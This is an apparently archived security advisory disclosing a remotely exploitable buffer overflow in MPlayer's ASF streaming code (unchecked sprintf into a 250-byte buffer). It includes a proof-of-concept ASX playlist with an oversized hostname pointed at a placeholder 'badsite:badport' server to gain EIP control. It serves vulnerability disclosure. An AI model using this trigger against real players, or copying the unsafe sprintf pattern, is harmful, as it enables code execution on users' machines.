<<< Date Index >>>     <<< Thread Index >>>

Mplayer Buffer Overflow



Favorite Linux Player Buffer Overflow
 

 Product:  Mplayer
 Developers:  http://www.mplayerhq.hu
 OS:    Port to All *NIX and Win32
 Remote Exploitable:  YES

Developers has been contacted, problem was fixed, recomended update your
mplayer version.

 In the source tree there is a file called asf_streaming.c this file has a
function named asf_http_request, that function has two buffer overflows,
this overflows are in the sprintf lines.
 
 
 asf_http_request {
                char str[250];
                ....
                ...
                ..
                sprintf( str, "Host: %s:%d", server_url->hostname,
 server_url->port );     
                ....
                ...     
                ..
                sprintf( str, "Host: %s:%d", url->hostname, url->port );
 
                ....
                ...
                ..
 }

 
  
 This, at a first look, may look as it can´t be exploited ( because the
MAXHOSTLEN size restriction )... but if in an ASX file like this with a
"badsite" listening in "badport" send "\n\n" as answer you could lead to a
fully controllable EIP buffer overflow
 
 
 <asx version = "3.0">
 <title>Bas Site ASX</title>
 
 <moreinfo href = "mailto:info@xxxxxxxxxxx
 <mailto:info@xxxxxxxxxxx> " />
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://www.badsite.com/streaming/grupo.gif> " style="ICON" />
 <banner href= "images/bannermitre.gif">
 <abstract>Bad Site live</abstract>
 <moreinfo target="_blank" href = "http://www.badsite.com/
 <http://www.badsite.com/> " />
 </banner>
 
 <entry>
 <title>NEWS</title>
 <AUTHOR>NEWS</AUTHOR>
 <COPYRIGHT>© All by the news</COPYRIGHT>
 <ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa"/>
 <logo href = "http://www.badsite.com/streaming/grupo.gif
 <http://badsite.com/streaming/grupo.gif> " style="ICON" />
 </entry>
 </asx>
 


 Regards,
 
   Hernán Otero
   hernan.otero@xxxxxxx